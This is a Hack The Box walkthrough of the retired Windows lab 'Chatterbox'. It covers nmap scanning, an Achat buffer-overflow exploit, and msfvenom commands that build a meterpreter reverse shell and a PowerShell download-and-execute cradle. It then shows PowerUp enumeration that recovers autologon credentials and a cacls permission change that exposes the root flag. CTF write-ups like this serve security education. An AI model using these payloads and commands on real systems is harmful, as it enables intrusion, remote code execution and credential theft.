Hack the Box – Chatterbox Walkthrough

Today, we’re going to solve another CTF machine “Chatterbox“. It is now a retired box and can be accessible to VIP members.


• Target OS: Windows
• Services: 9255, 9256
• IP Address:
• Difficulty: Medium


• Getting user
• Getting root


As always, the first step consists of the reconnaissance phase as port scanning.

Ports Scanning

During this step, we’re gonna identify the target to see what we have behind the IP Address.

nmap -p 1-65535 -T4 -A -v

Enumerating Port 9255

Nmap reveals there’s Achat service running on HTTP protocol.

We got nothing here let’s move ahead.

Enumerating Port 9256

We know there’s an achat application installed. To find the version of it we can do banner grabbing but in this case, it didn’t work.

Let’s searchsploit achat

Exploit: Achat 0.150 beta7 – Remote Buffer Overflow

searchsploit -m exploits/windows/remote/36025.py

Let’s edit our exploit.


Exploit: Achat 0.150 beta7 - Remote Buffer Overflow - Windows remote Exploit

Method #1

Let’s create our payload first and insert it into the exploit.

msfvenom — platform Windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=1337 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x 88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\ xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1 \xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

We executed our exploit and starting listening our reverse shell.

Reverse shell was consistently being closed so we migrated upon executing.

set AutoRunScript post/windows/manage/migrate

System Information

Method #2

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).DownloadString('')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

However, metasploit shell is much convenient.

User flag can be found here C:\Users\Alfred\Desktop\user.txt

Privilege Escalation

Let’s start by doing basic priv esc enumeration.

By running through some basic priv esc enumeration and running powerup.ps1 script we got credentials in the registry for autologon.

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

DefaultUserName: Alfred DefaultPassword: Welcome1!

There’s a possibility that the password can be reuse for administrator. But since we already have read access into administrator directory as user alfred, we see in below screenshot.

We can change permissions on root.txt using icacls.

C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop cacls C:\Users\Administrator\Desktop C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F CHATTERBOX\Administrator:(OI)(CI)(ID)F BUILTIN\Administrators:(OI)(CI)(ID)F CHATTERBOX\Alfred:(OI)(CI)(ID)F C:\Users\Administrator\Desktop>cacls root.txt /g Alfred:r cacls root.txt /g Alfred:r y Are you sure (Y/N)?processed file: C:\Users\Administrator\Desktop\root.txt

C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop\root.txt cacls C:\Users\Administrator\Desktop\root.txt C:\Users\Administrator\Desktop\root.txt CHATTERBOX\Alfred:R